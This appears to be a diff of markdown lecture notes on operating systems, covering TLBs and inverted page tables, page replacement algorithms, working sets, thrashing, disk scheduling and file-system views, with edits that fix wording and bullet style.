* Remember: **locality** states that processes make a large number of references to a small number of pages. - Remember: **locality** states that processes make a large number of references to a small number of pages.
![TLB diagram](assets/w.png) ![TLB diagram](assets/w.png)
The split arrows going into the TLB represent searching in parallel. The split arrows going into the TLB represent searching in parallel.
* If the TLB gets a hit, it just returns the frame number - If the TLB gets a hit, it just returns the frame number
* However if the TLB misses: - However if the TLB misses:
* We have to account for the time it took to search the TLB - We have to account for the time it took to search the TLB
* We then have to look in the page table to find the frame number - We then have to look in the page table to find the frame number
* Worst case scenario is a page fault (takes the longest). This is where we have to retrieve a page table from secondary memory, so that it can then be searched. - Worst case scenario is a page fault (takes the longest). This is where we have to retrieve a page table from secondary memory, so that it can then be searched.
> Quick maths: > Quick maths:
> >
> * Assume a single-level page table > - Assume a single-level page table
> >
> * Assume 20ns associative **TLB lookup time** > - Assume 20ns associative **TLB lookup time**
> >
> * Assume a 100ns **memory access time** > - Assume a 100ns **memory access time**
> >
> * **TLB hit** => 20 + 100 = 120ns > - **TLB hit** => 20 + 100 = 120ns
> * **TLB miss** => 20 + 100 + 100 = 220ns > - **TLB miss** => 20 + 100 + 100 = 220ns
> >
> * Performance evaluation of TLBs > - Performance evaluation of TLBs
> >
> * For an 80% hit rate, the estimated access time is: > - For an 80% hit rate, the estimated access time is:
> >
> $$ > $$
> 120\cdot 0.8 + 220\cdot (1-0.8)=140ns > 120\cdot 0.8 + 220\cdot (1-0.8)=140ns
> $$ > $$
> >
> (**40% slowdown** relative to absolute addressing) > (**40% slowdown** relative to absolute addressing)
> >
> * For a 98% hit rate, the estimated access time is: > - For a 98% hit rate, the estimated access time is:
> >
> $$ > $$
> 120\cdot 0.98 + 220\cdot (1-0.98)=122ns > 120\cdot 0.98 + 220\cdot (1-0.98)=122ns
> $$ > $$
> >
> (**22% slowdown**) > (**22% slowdown**)
> >
> NOTE: **page tables** can be **held in virtual memory** => **further slow down** due to **page faults**. > NOTE: **page tables** can be **held in virtual memory** => **further slow down** due to **page faults**.
@@ -63,65 +63,61 @@ The split arrows going into the TLB represent searching in parallel.
A **normal page table size** is proportional to the number of pages in the virtual address space => this can be prohibitive for modern machines A **normal page table size** is proportional to the number of pages in the virtual address space => this can be prohibitive for modern machines
>An **inverted page table's size** is **proportional** to the size of **main memory** > An **inverted page table's size** is **proportional** to the size of **main memory**
> >
>* The inverted table contains one **entry for every frame** (not for every page) and it **indexes entries by frame number** not by page number. > - The inverted table contains one **entry for every frame** (not for every page) and it **indexes entries by frame number** not by page number.
>* When a process references a page, the OS must search the entire inverted page table for the corresponding entry (which could be too slow) > - When a process references a page, the OS must search the entire inverted page table for the corresponding entry (which could be too slow)
> * It does save memory as there are fewer frames than pages. > - It does save memory as there are fewer frames than pages.
>* To find if your pages is in main memory, you need to iterate through the entire list. > - To find out if your page is in main memory, you need to iterate through the entire list.
>* *Solution*: Use a **hash function** that transforms page numbers (*n* bits) into frame numbers (*m* bits) - Remember *n* > *m* > - *Solution*: Use a **hash function** that transforms page numbers (*n* bits) into frame numbers (*m* bits) - Remember *n* > *m*
> * The has functions turns a page number into a potential frame number. > - The hash function turns a page number into a potential frame number.
So when looking for the page's frame location. We have to sequentially search through the table until we hit a match, we then get the frame number from the index - in this case 4. When looking for the page's frame location, we have to sequentially search through the table until we find a match. We then get the frame number from the index - in this case 4.
#### Inverted Page Table Entry #### Inverted Page Table Entry
> * The **frame number** will be the index of the inverted page table. > - The **frame number** will be the index of the inverted page table.
> * Process Identifier (**PID**) - The process that owns this page. > - Process Identifier (**PID**) - The process that owns this page.
> * Virtual Page Number (**VPN**) > - Virtual Page Number (**VPN**)
> * **Protection** bits (Read/Write/Execute) > - **Protection** bits (Read/Write/Execute)
> * **Chaining Pointer** - This field points towards the next frame that has exactly the same VPN. We need this to solve collisions > - **Chaining Pointer** - This field points towards the next frame that has exactly the same VPN. We need this to solve collisions
![Inverted Page table entry](assets/Y.png)
![inverted page table address translation](assets/Z.png)
Due to the hash function, we now only have to look through all entries with **VPN**: 1 instead of all the entries. Due to the hash function, we now only have to look through all entries with **VPN**: 1 instead of all the entries.
#### Advantages #### Advantages
* The OS maintains a **single inverted page table** for all processes - The OS maintains a **single inverted page table** for all processes
* It **saves lots of space** (especially when the virtual address space is much larger than the physical memory) - It **saves lots of space** (especially when the virtual address space is much larger than the physical memory)
#### Disadvantages #### Disadvantages
* Virtual to physical **translation becomes much slower** - Virtual to physical **translation becomes much slower**
* Hash tables eliminates the need of searching the whole inverted table, but we have to handle collisions (which also **slows down translation**) - Hash tables eliminate the need to search the whole inverted table, but we have to handle collisions (which also **slows down translation**)
* TLBs are necessary to improve their performance. - TLBs are necessary to improve their performance.
### Page Loading ### Page Loading
* Two key decisions have to be made when using virtual memory - Two key decisions have to be made when using virtual memory
* What pages are **loaded** and when - What pages are **loaded** and when
* Predictions can be made for optimisation to reduce page faults - Predictions can be made for optimisation to reduce page faults
* What pages are **removed** from memory and when - What pages are **removed** from memory and when
* **page replacement algorithms** - **page replacement algorithms**
#### Demand Paging #### Demand Paging
> Demand paging starts the process with **no pages in memory** > Demand paging starts the process with **no pages in memory**
> >
> * The first instruction will immediately cause a **page fault**. > - The first instruction will immediately cause a **page fault**.
> * **More page faults** will follow but they will **stabilise over time** until moving to the next **locality** > - **More page faults** will follow but they will **stabilise over time** until moving to the next **locality**
> * The set of pages that is currently being used is called it's **working set** (same as the resident set) > - The set of pages that is currently being used is called its **working set** (same as the resident set)
> * Pages are only **loaded when needed** (i.e after **page faults**) > - Pages are only **loaded when needed** (i.e. after **page faults**)
#### Pre-Paging #### Pre-Paging
> When the process is started, all pages expected to be used (the working set) are **brought into memory at once** > When the process is started, all pages expected to be used (the working set) are **brought into memory at once**
> >
> * This **reduces the page fault rate** > - This **reduces the page fault rate**
> * Retrieving multiple (**contiguously stored**) pages **reduces transfer times** (seek time, rotational latency, etc) > - Retrieving multiple (**contiguously stored**) pages **reduces transfer times** (seek time, rotational latency, etc)
> >
> **Pre-paging** loads as many pages as possible **before page faults are generated** (a similar method is used when processes are **swapped in and out**) > **Pre-paging** loads as many pages as possible **before page faults are generated** (a similar method is used when processes are **swapped in and out**)
@@ -131,35 +127,35 @@ Due to the hash function, we now only have to look through all entries with **VP
NOTE: This doesn't take into account TLBs. NOTE: This doesn't take into account TLBs.
The expected access time is **proportional to page fault rate** when keeping page faults into account. The expected access time is **proportional to page fault rate** when taking page faults into account.
$$ $$
T_{a} \space\space\alpha \space\space p T_{a} \space\space\alpha \space\space p
$$ $$
* Ideally, all pages would have to be loaded without demanding paging. - Ideally, all pages would have to be loaded without demand paging.
### Page Replacement ### Page Replacement
> * The OS must choose a **page to remove** when a new one is loaded > - The OS must choose a **page to remove** when a new one is loaded
> * This choice is made by **page replacement algorithms** and **takes into account**: > - This choice is made by **page replacement algorithms** and **takes into account**:
> * When the page was **last used** or **expected to be used again** > - When the page was **last used** or **expected to be used again**
> * Whether the page has been **modified** (this would cause a write). > - Whether the page has been **modified** (this would cause a write).
> * Replacement choices have to be made **intelligently** to **save time**. > - Replacement choices have to be made **intelligently** to **save time**.
#### Optimal Page Replacement #### Optimal Page Replacement
> * In an **ideal** world > - In an **ideal** world
> * Each page is labelled with the **number of instructions** that will be executed/length of time before it is used again. > - Each page is labelled with the **number of instructions** that will be executed/length of time before it is used again.
> * The page which is **going to be not referenced** for the **longest time** is the optimal one to remove. > - The page which is **going to be not referenced** for the **longest time** is the optimal one to remove.
> * The **optimal approach** is **not possible to implement** > - The **optimal approach** is **not possible to implement**
> * It can be used for post execution analysis > - It can be used for post execution analysis
> * It provides a **lower bound** on the number of page faults (used for comparison with other algorithms) > - It provides a **lower bound** on the number of page faults (used for comparison with other algorithms)
#### FIFO #### FIFO
> * FIFO maintains a **linked list** of new pages, and **new pages** are added at the end of the list > - FIFO maintains a **linked list** of new pages, and **new pages** are added at the end of the list
> * The **oldest page at the head** of the list is **evicted when a page fault occurs** > - The **oldest page at the head** of the list is **evicted when a page fault occurs**
> >
> This is a pretty bad algorithm <s>unsurprisingly</s> > This is a pretty bad algorithm <s>unsurprisingly</s>
+50 -53
View File
@@ -6,20 +6,20 @@
##### Second chance ##### Second chance
> * If a page at the front of the list has **not been referenced** it is **evicted** > - If a page at the front of the list has **not been referenced** it is **evicted**
> * If the reference bit is set, the page is **placed at the end** of the list and it's reference bit is unset. > - If the reference bit is set, the page is **placed at the end** of the list and its reference bit is unset.
> * This works better than FIFO and is relatively simple > - This works better than FIFO and is relatively simple
> * **Costly to implement** as the list is constantly changing. > - **Costly to implement** as the list is constantly changing.
> * Can degrade to FIFO if all pages were initially referenced. > - Can degrade to FIFO if all pages were initially referenced.
##### Clock Replacement Algorithm ##### Clock Replacement Algorithm
> The second chance implementation can be improved by **maintaining the page list as a circle** > The second chance implementation can be improved by **maintaining the page list as a circle**
> >
> * A **pointer** points to the last visited page. > - A **pointer** points to the last visited page.
> * In this form the algorithm is called the one handed clock > - In this form, the algorithm is called the one-handed clock
> * It is faster, but can still be **slow if the list is long**. > - It is faster, but can still be **slow if the list is long**.
> * The **time spent** on **maintaining** the list is **reduced**. > - The **time spent** on **maintaining** the list is **reduced**.
![clock replacement](assets/a2.png) ![clock replacement](assets/a2.png)
@@ -27,7 +27,7 @@
> For NRU, **referenced** and **modified** bits are kept in the page table > For NRU, **referenced** and **modified** bits are kept in the page table
> >
> * Referenced bits are set to 0 at the start, and **reset periodically** > - Referenced bits are set to 0 at the start, and **reset periodically**
> >
> There are four different **page types** in NRU: > There are four different **page types** in NRU:
> >
@@ -46,35 +46,34 @@
##### Least Used Recently ##### Least Used Recently
> Least recently used **evicts the page** that has **not be used for the longest** > Least recently used **evicts the page** that has **not been used for the longest**
> >
> * The OS must keep track of when a page was last used. > - The OS must keep track of when a page was last used.
> * Every page table entry contains a field for the counter > - Every page table entry contains a field for the counter
> * This is **not cheap to implement** as we need to maintain a **list of pages** which are **sorted** in the order in which they have been used. > - This is **not cheap to implement** as we need to maintain a **list of pages** which are **sorted** in the order in which they have been used.
> >
> This algorithm can be **implemented in hardware** using a **counter** that is incremented after each instruction ... > This algorithm can be **implemented in hardware** using a **counter** that is incremented after each instruction ...
![least used recently visualisation](assets/a3.png) ![least used recently visualisation](assets/a3.png)
This will look familiar to the FIFO algorithm however, when a page is used, that is like its just come in. This will look familiar to the FIFO algorithm. However, when a page is used, it is treated as if it has just come in.
### Resident Set ### Resident Set
How many pages should be allocated to individual processes: How many pages should be allocated to individual processes:
* **Small resident sets** enable to store **more processes in memory** => improved CPU utilisation. - **Small resident sets** enable us to store **more processes in memory** => improved CPU utilisation.
* **Small resident sets** may result in **more page faults** - **Small resident sets** may result in **more page faults**
* **Large resident sets** may **no longer reduce** the **page fault rate** (**diminishing returns**) - **Large resident sets** may **no longer reduce** the **page fault rate** (**diminishing returns**)
A trade-off exists between the **sizes of the resident sets** and **system utilisation**. A trade-off exists between the **sizes of the resident sets** and **system utilisation**.
Resident set sizes may be **fixed** or **variable** (adjusted at run-time) Resident set sizes may be **fixed** or **variable** (adjusted at run-time)
* For **variable sized** resident sets, **replacement policies** can be: - For **variable-sized** resident sets, **replacement policies** can be:
* **Local**: a page of the same process is replaced - **Local**: a page of the same process is replaced
* **Global**: a page can be taken away from a **different process** - **Global**: a page can be taken away from a **different process**
* Variable sized sets require **careful evaluation of their size** when a **local scope** is used (often based on the **working set** or the **page fault rate**) - Variable sized sets require **careful evaluation of their size** when a **local scope** is used (often based on the **working set** or the **page fault rate**)
### Working Set ### Working Set
@@ -82,18 +81,18 @@ The **resident set** comprises the set of pages of the process that are in memor
The **working set** is a subset of the resident set that is actually needed for execution. The **working set** is a subset of the resident set that is actually needed for execution.
* The **working set** $W(t, k)$ comprises the set of referenced pages in the last $k$ (working set window) **virtual time units for the process**. - The **working set** $W(t, k)$ comprises the set of referenced pages in the last $k$ (working set window) **virtual time units for the process**.
* $k$ can be defined as **memory references** or as **actual process time** - $k$ can be defined as **memory references** or as **actual process time**
* The set of most recent used pages - The set of most recently used pages
* The set of pages used within a pre-specified time interval - The set of pages used within a pre-specified time interval
* The **working set size** can be used as a guide for the number of frames that should be allocated to a process. - The **working set size** can be used as a guide for the number of frames that should be allocated to a process.
![working set](assets/a4.png) ![working set](assets/a4.png)
The working set is a **function of time** $t$: The working set is a **function of time** $t$:
* Processes **move between localities**, hence, the pages that are included in the working set **change over time** - Processes **move between localities**, hence, the pages that are included in the working set **change over time**
* **Stable** intervals alternate with intervals of **rapid change** - **Stable** intervals alternate with intervals of **rapid change**
$|W(t,k)|$ is then a variable in time. Specifically: $|W(t,k)|$ is then a variable in time. Specifically:
@@ -105,74 +104,72 @@ where $N$ is the total number of pages of the process. All the maths is saying i
Choosing the right value for $k$ is important: Choosing the right value for $k$ is important:
* Too **small**: inaccurate, pages are missing - Too **small**: inaccurate, pages are missing
* Too **large**: too many unused pages present - Too **large**: too many unused pages present
* **Infinity**: all pages of the process are in the working set - **Infinity**: all pages of the process are in the working set
Working sets can be used to guide the **size of the resident sets** Working sets can be used to guide the **size of the resident sets**
* Monitor the working set - Monitor the working set
* Remove pages from the resident set that are not in the working set - Remove pages from the resident set that are not in the working set
The working set is costly to maintain => **page fault frequency (PFF)** can be used as an approximation: $PFF\space\alpha\space k$ The working set is costly to maintain => **page fault frequency (PFF)** can be used as an approximation: $PFF\space\alpha\space k$
* If the PFF is increased -> we need to increase $k$ - If the PFF is increased -> we need to increase $k$
* If PFF is very low -> we could decrease $k$ to allow more processes to have more pages. - If PFF is very low -> we could decrease $k$ to allow more processes to have more pages.
#### Global Replacement #### Global Replacement
> Global replacement policies can select frames from the entire set (they can be taken from other processes) > Global replacement policies can select frames from the entire set (they can be taken from other processes)
> >
> * Frames are **allocated dynamically** to processes > - Frames are **allocated dynamically** to processes
> * Processes cannot control their own page fault frequency. The PFF of one process is **influenced by other processes**. > - Processes cannot control their own page fault frequency. The PFF of one process is **influenced by other processes**.
#### Local Replacement #### Local Replacement
> Local replacement policies can only select frames that are allocated to the current process > Local replacement policies can only select frames that are allocated to the current process
> >
> * Every process has a **fixed fraction of memory** > - Every process has a **fixed fraction of memory**
> * The **locally oldest page** is not necessarily the **globally oldest page** > - The **locally oldest page** is not necessarily the **globally oldest page**
Windows uses a variable approach with local replacement. Page replacement algorithms can use both policies. Windows uses a variable approach with local replacement. Page replacement algorithms can use both policies.
### Paging Daemon ### Paging Daemon
It is more efficient to **proactively** keep a number of **free pages** for **future page faults** It is more efficient to **proactively** keep a number of **free pages** for **future page faults**
* If not, we may have to **find a page** to evict and we **write it to the drive** (if its been modified) first when a page fault occurs. - If not, we may have to **find a page** to evict and **write it to the drive** (if it's been modified) first when a page fault occurs.
Many systems have a background process called a **paging daemon**. Many systems have a background process called a **paging daemon**.
* This process **runs at periodic intervals** - This process **runs at periodic intervals**
* It inspects the state of the frames and if too few frames are free, it **selects pages to evict** (using page replacement algorithms) - It inspects the state of the frames and if too few frames are free, it **selects pages to evict** (using page replacement algorithms)
Paging daemons can be combined with **buffering** (free and modified lists) => write the modified pages **but keep them in main memory** when possible. Paging daemons can be combined with **buffering** (free and modified lists) => write the modified pages **but keep them in main memory** when possible.
**Buffering**: a process that preemptively writes modified pages to the disk. That way when there's a page fault we don't lose the time taken to write to disk **Buffering**: a process that preemptively writes modified pages to the disk. That way when there's a page fault we don't lose the time taken to write to disk
### Thrashing ### Thrashing
Assume **all available pages are in active use** and a new page needs to be loaded: Assume **all available pages are in active use** and a new page needs to be loaded:
* The page that will be evicted will have to be **reloaded soon afterwards** - The page that will be evicted will have to be **reloaded soon afterwards**
**Thrashing** occurs when pages are **swapped out** and then **loaded back in immediately** **Thrashing** occurs when pages are **swapped out** and then **loaded back in immediately**
#### Causes of thrashing include: #### Causes of thrashing include:
* The degree of multi-programming is too high i.e the total **demand** (the sum of all working sets sizes) **exceeds supply** (the available frames) - The degree of multi-programming is too high, i.e. the total **demand** (the sum of all working set sizes) **exceeds supply** (the available frames)
* An individual process is allocated **too few pages** - An individual process is allocated **too few pages**
This can be prevented by **using good page replacement algorithms**, reducing the **degree of multi-programming** or adding more memory. This can be prevented by **using good page replacement algorithms**, reducing the **degree of multi-programming** or adding more memory.
The **page fault frequency** can be used to detect that a system is thrashing. The **page fault frequency** can be used to detect that a system is thrashing.
> * CPU utilisation is too low => scheduler **increases degree of multi-programming** > - CPU utilisation is too low => scheduler **increases degree of multi-programming**
> * Frames are allocated to new processes and taken away from existing processes > - Frames are allocated to new processes and taken away from existing processes
> * I/O requests are queued up as a consequence of page faults > - I/O requests are queued up as a consequence of page faults
> >
> This is a positive reinforcement cycle. > This is a positive reinforcement cycle.
And when all this comes together, its how memory management working in modern computers. When all this comes together, this is how memory management works in modern computers.
+47 -49
View File
@@ -8,9 +8,9 @@
> Disks are constructed as multiple aluminium/glass platters covered with **magnetisable material** > Disks are constructed as multiple aluminium/glass platters covered with **magnetisable material**
> >
> * Read/Write heads fly just above the surface and are connected to a single disk arm controlled by a single actuator > - Read/Write heads fly just above the surface and are connected to a single disk arm controlled by a single actuator
> * **Data** is stored on **both sides** > - **Data** is stored on **both sides**
> * Hard disks **rotate** at a **constant speed** > - Hard disks **rotate** at a **constant speed**
> >
> A hard disk controller sits between the CPU and the drive > A hard disk controller sits between the CPU and the drive
> >
@@ -22,15 +22,15 @@
> Disks are organised in: > Disks are organised in:
> >
> * **Cylinders**: a collection of tracks in the same relative position to the spindle > - **Cylinders**: a collection of tracks in the same relative position to the spindle
> * **Tracks**: a concentric circle on a single platter side > - **Tracks**: a concentric circle on a single platter side
> * **Sectors**: segments of a track - usually have an **equal number of bytes** in them, consisting of a **preamble, data** and an **error correcting code** (ECC). > - **Sectors**: segments of a track - usually have an **equal number of bytes** in them, consisting of a **preamble, data** and an **error correcting code** (ECC).
> >
> The number of sectors on each track increases from the inner most track to the outer tracks. > The number of sectors on each track increases from the innermost track to the outer tracks.
##### Organisation of hard drives ##### Organisation of hard drives
Disks usually have a **cylinder skew** i.e an **offset** is added to sector 0 in adjacent tracks to account for the seek time. Disks usually have a **cylinder skew**, i.e. an **offset** is added to sector 0 in adjacent tracks to account for the seek time.
In the past, consecutive **disk sectors were interleaved** to account for transfer time (of the read/write head) In the past, consecutive **disk sectors were interleaved** to account for transfer time (of the read/write head)
@@ -40,11 +40,11 @@ NOTE: disk capacity is reduced due to preamble & ECC
**Access time** = seek time + rotational delay + transfer time **Access time** = seek time + rotational delay + transfer time
* **Seek time**: time needed to move the arm to the cylinder - **Seek time**: time needed to move the arm to the cylinder
* **Rotational latency**: time before the sector appears underneath the read/write head (on average its half a rotation) - **Rotational latency**: time before the sector appears underneath the read/write head (on average, it's half a rotation)
* **Transfer time**: time to transfer the data - **Transfer time**: time to transfer the data
![hard drive access times](assets/a6.png) ![hard drive access times](assets/a6.png)
@@ -54,7 +54,7 @@ In this scenario, dominance of seek time leaves room for **optimisation** by car
![hard disk delay](assets/a7.png) ![hard disk delay](assets/a7.png)
The **estimated seek time** (i.e to move the arm from one track to another) is approximated by: The **estimated seek time** (i.e. to move the arm from one track to another) is approximated by:
$$ $$
T_{s} = n \times m + s T_{s} = n \times m + s
@@ -64,10 +64,10 @@ In which $T_{s}$ denotes the estimated seek time, $n$ the **number of tracks** t
> Let us assume a disk that rotates at 3600 rpm > Let us assume a disk that rotates at 3600 rpm
> >
> * One rotation = 16.7 ms > - One rotation = 16.7 ms
> * The average **rotational latency** $T_{r}$ is then 8.3 ms > - The average **rotational latency** $T_{r}$ is then 8.3 ms
> >
> Let **b** denote the **number of bytes transferred**, **N** the **number of bytes per track**, and **rpm** the **rotation speed in rotations per minute**, the per track, the transfer time, $T_{t}$, is then given by: > Let **b** denote the **number of bytes transferred**, **N** the **number of bytes per track**, and **rpm** the **rotation speed in rotations per minute**. The transfer time per track, $T_{t}$, is then given by:
> >
> $$ > $$
> T_{t} = \frac b N \times \frac {ms\space per\space minute}{rpm} > T_{t} = \frac b N \times \frac {ms\space per\space minute}{rpm}
@@ -75,26 +75,26 @@ In which $T_{s}$ denotes the estimated seek time, $n$ the **number of tracks** t
> >
> $N$ bytes take 1 revolution => $\frac{60000}{3600}$ ms = $\frac {ms\space per\space minute}{rpm}$ > $N$ bytes take 1 revolution => $\frac{60000}{3600}$ ms = $\frac {ms\space per\space minute}{rpm}$
> >
> $b$ contiguous bytes takes $\frac{b}{N}$ revolutions. > $b$ contiguous bytes take $\frac{b}{N}$ revolutions.
> Read a file of **size 256 sectors** with; > Read a file of **size 256 sectors** with:
> >
> * $T_{s}$ = 20 ms (average seek time) > - $T_{s}$ = 20 ms (average seek time)
> * 32 sectors per track > - 32 sectors per track
> >
> Suppose the file is stored as compact as possible (its stored contiguously) > Suppose the file is stored as compactly as possible (it's stored contiguously)
> >
> * The first track takes: seek time + rotational delay + transfer time > - The first track takes: seek time + rotational delay + transfer time
> $20 + 8.3 + 16.7 = 45ms$ > $20 + 8.3 + 16.7 = 45ms$
> * Assuming no cylinder skew and neglecting small seeks between tracks we only need to account for rotational delay + transfer time > - Assuming no cylinder skew and neglecting small seeks between tracks we only need to account for rotational delay + transfer time
> $8.3+16.7=25ms$ > $8.3+16.7=25ms$
> >
> The total time is $45+7\times 25 = 220ms = 0.22s$ > The total time is $45+7\times 25 = 220ms = 0.22s$
> In case the access is not sequential but at **random for the sectors** we get: > In case the access is not sequential but at **random for the sectors** we get:
> >
> * Time per sector = $T_{s}+T_{r}+T_{t} = 20+8.3+0.5=28.8ms$ > - Time per sector = $T_{s}+T_{r}+T_{t} = 20+8.3+0.5=28.8ms$
> $T_{t} = 16.7\times \frac {1}{32} = 0.5$ > $T_{t} = 16.7\times \frac {1}{32} = 0.5$
> >
> It is important to **position the sectors carefully** and **avoid disk fragmentation** > It is important to **position the sectors carefully** and **avoid disk fragmentation**
@@ -102,12 +102,12 @@ In which $T_{s}$ denotes the estimated seek time, $n$ the **number of tracks** t
The OS must use the hardware efficiently: The OS must use the hardware efficiently:
* The file system can **position/organise files strategically** - The file system can **position/organise files strategically**
* Having **multiple disk requests** in a queue allows us to **minimise** the **arm movement** - Having **multiple disk requests** in a queue allows us to **minimise** the **arm movement**
Note that every I/O operation goes through a system call, allowing the **OS to intercept the request and re sequence it**. Note that every I/O operation goes through a system call, allowing the **OS to intercept the request and resequence it**.
If the drive **is free**, the request can be serviced immediately, if not the request is queued. If the drive **is free**, the request can be serviced immediately. If not, the request is queued.
In a dynamic situation, several I/O requests will be **made over time** that are kept in a **table of requested sectors per cylinder.** In a dynamic situation, several I/O requests will be **made over time** that are kept in a **table of requested sectors per cylinder.**
@@ -125,13 +125,11 @@ In a dynamic situation, several I/O requests will be **made over time** that are
> >
> ![FCFS](assets/a8.png) > ![FCFS](assets/a8.png)
#### Shortest Seek Time First #### Shortest Seek Time First
> Selects the request that is closest to the current head position to reduce head movement > Selects the request that is closest to the current head position to reduce head movement
> >
> * This allows us to gain **~50%** over FCFS > - This allows us to gain **~50%** over FCFS
> >
> Total length is: `|11-12|+|12-9|+|9-16|+|16-1|+|1-34|+|34-36|=61` > Total length is: `|11-12|+|12-9|+|9-16|+|16-1|+|1-34|+|34-36|=61`
> >
@@ -139,16 +137,16 @@ In a dynamic situation, several I/O requests will be **made over time** that are
> >
> Disadvantages: > Disadvantages:
> >
> * Could result in starvation: > - Could result in starvation:
> * The **arm stays in the middle of the disk** in case of heavy load, edge cylinders are poorly served - the strategy is biased > - The **arm stays in the middle of the disk** in case of heavy load, edge cylinders are poorly served - the strategy is biased
> * Continuously arriving requests for the same location could **starve other regions** > - Continuously arriving requests for the same location could **starve other regions**
#### SCAN #### SCAN
> **Keep moving in the same direction** until end is reached > **Keep moving in the same direction** until end is reached
> >
> * It continues in the current direction, **servicing all pending requests** as it passes over them > - It continues in the current direction, **servicing all pending requests** as it passes over them
> * When it gets to the **last cylinder**, it **reverses direction** and **services pending requests** > - When it gets to the **last cylinder**, it **reverses direction** and **services pending requests**
> >
> Total length: `|11-12|+|12-16|+|16-34|+|34-36|+|36-9|+|9-1|=60` > Total length: `|11-12|+|12-16|+|16-34|+|34-36|+|36-9|+|9-1|=60`
> >
@@ -156,16 +154,16 @@ In a dynamic situation, several I/O requests will be **made over time** that are
> >
> **Disadvantages**: > **Disadvantages**:
> >
> * The **upper limit** on the waiting time is $2\space\times$ number of cylinders (no starvation) > - The **upper limit** on the waiting time is $2\space\times$ number of cylinders (no starvation)
> * The **middle cylinders are favoured** if the disk is heavily used. > - The **middle cylinders are favoured** if the disk is heavily used.
##### C-SCAN ##### C-SCAN
> Once the outer/inner side of the disk has been reached, the **requests at the other end of the disk** have been **waiting the longest** > Once the outer/inner side of the disk has been reached, the **requests at the other end of the disk** have been **waiting the longest**
> >
> * SCAN can be improved by using a circular => C-SCAN > - SCAN can be improved by using a circular => C-SCAN
> * When the disk arm gets to the last cylinder of the disk, it **reverses direction** but **does not service requests** on the return. > - When the disk arm gets to the last cylinder of the disk, it **reverses direction** but **does not service requests** on the return.
> * It is **fairer** and equalises **response times on the disk** > - It is **fairer** and equalises **response times on the disk**
> >
> Total length: `|11-12|+|12-16|+|16-34|+|34-36|+|36-1|+|1-9|=68` > Total length: `|11-12|+|12-16|+|16-34|+|34-36|+|36-1|+|1-9|=68`
@@ -173,8 +171,8 @@ In a dynamic situation, several I/O requests will be **made over time** that are
> Look-SCAN moves to the last cylinder containing **the first or last request** (as opposed to the first/last cylinder on the disk like SCAN) > Look-SCAN moves to the last cylinder containing **the first or last request** (as opposed to the first/last cylinder on the disk like SCAN)
> >
> * However, seeks are **cylinder by cylinder** and one cylinder contains multiple tracks > - However, seeks are **cylinder by cylinder** and one cylinder contains multiple tracks
> * It may happen that the arm "sticks" to a cylinder > - It may happen that the arm "sticks" to a cylinder
##### N-Step SCAN ##### N-Step SCAN
@@ -193,10 +191,10 @@ In a dynamic situation, several I/O requests will be **made over time** that are
For current drives, the time **required to seek a new cylinder** is more than the **rotational time**. For current drives, the time **required to seek a new cylinder** is more than the **rotational time**.
* It makes sense to **read more sectors than actually required** - It makes sense to **read more sectors than actually required**
* **Read** sectors during rotational delay (the sectors that just so happen to pass under the control arm) - **Read** sectors during rotational delay (the sectors that just so happen to pass under the control arm)
* **Modern controllers read multiple sectors** when asked for the data from one sector **track-at-a-time caching**. - **Modern controllers read multiple sectors** when asked for the data from one sector **track-at-a-time caching**.
### Scheduling on SSDs ### Scheduling on SSDs
SSDs don't have $T_{seek}$ or rotational delay, we can use FCFS (SSTF, SCAN etc may reduce performace due to no head to move). SSDs don't have $T_{seek}$ or rotational delay, so we can use FCFS (SSTF, SCAN etc. may reduce performance because there is no head to move).
+69 -74
View File
@@ -6,39 +6,39 @@
A **user view** that defines a file system in terms of the **abstractions** that the operating system provides A **user view** that defines a file system in terms of the **abstractions** that the operating system provides
An **implementation view** that defined the file system in terms of its **low level implementation** An **implementation view** that defines the file system in terms of its **low-level implementation**
**Important aspects of the user view** **Important aspects of the user view**
> * The **file abstraction** which **hides** implementation details from the user > - The **file abstraction** which **hides** implementation details from the user
> * File **naming policies**, user file **attributes** (size, protection, owner etc) > - File **naming policies**, user file **attributes** (size, protection, owner etc)
> * There are also **system attributes** for files (e.g. non-human readable, archive flag, temp flag) > - There are also **system attributes** for files (e.g. non-human readable, archive flag, temp flag)
> * **Directory structures** and organisation > - **Directory structures** and organisation
> * **System calls** to interact with the file system > - **System calls** to interact with the file system
> >
> The user view defines how the file system looks to regular users and relates to **abstractions**. > The user view defines how the file system looks to regular users and relates to **abstractions**.
#### File Types #### File Types
Many OS's support several types of file. Both windows and Unix have regular files and directories: Many operating systems support several types of file. Both Windows and Unix have regular files and directories:
* **Regular files** contain user data in **ASCII** or **binary** format - **Regular files** contain user data in **ASCII** or **binary** format
* **Directories** group files together (but are files on an implementation level) - **Directories** group files together (but are files on an implementation level)
Unix also has character and block special files: Unix also has character and block special files:
* **Character special files** are used to model **serial I/O devices** (keyboards, printers etc) - **Character special files** are used to model **serial I/O devices** (keyboards, printers etc)
* **Block special files** are used to model drives - **Block special files** are used to model drives
### System Calls ### System Calls
File Control Blocks (FCBs) are kernel data structures (they are protected and only accessible in kernel mode) File Control Blocks (FCBs) are kernel data structures (they are protected and only accessible in kernel mode)
* Allowing user applications to access them directly could compromise their integrity - Allowing user applications to access them directly could compromise their integrity
* System calls enable a **user application** to **ask the OS** to carry out an action on it's behalf (in kernel mode) - System calls enable a **user application** to **ask the OS** to carry out an action on its behalf (in kernel mode)
* There are **two different categories** of **system calls** - There are **two different categories** of **system calls**
* **File manipulation**: `open()`, `close()`, `read()`, `write()` ... - **File manipulation**: `open()`, `close()`, `read()`, `write()` ...
* **Directory manipulation**: `create()`, `delete()`, `rename()`, `link()` ... - **Directory manipulation**: `create()`, `delete()`, `rename()`, `link()` ...
### File Structures ### File Structures
@@ -46,8 +46,8 @@ File Control Blocks (FCBs) are kernel data structures (they are protected and on
**Two or multiple level directories**: tree structures **Two or multiple level directories**: tree structures
* **Absolute path name**: from the root of the file system - **Absolute path name**: from the root of the file system
* **Relative path name**: the current working directory is used as the starting point - **Relative path name**: the current working directory is used as the starting point
**Directed acyclic graph (DAG)**: allows files to be shared (links files or sub-directories) but **cycles are forbidden** **Directed acyclic graph (DAG)**: allows files to be shared (links files or sub-directories) but **cycles are forbidden**
@@ -55,29 +55,29 @@ File Control Blocks (FCBs) are kernel data structures (they are protected and on
The use of **DAG** and **generic graph structures** results in **significant complications** in the implementation The use of **DAG** and **generic graph structures** results in **significant complications** in the implementation
* Trees are a DAG with the restriction that a child can only have one parent and don't contain cycles. - Trees are a DAG with the restriction that a child can only have one parent and don't contain cycles.
When searching the file system: When searching the file system:
* Cycles can result in **infinite loops** - Cycles can result in **infinite loops**
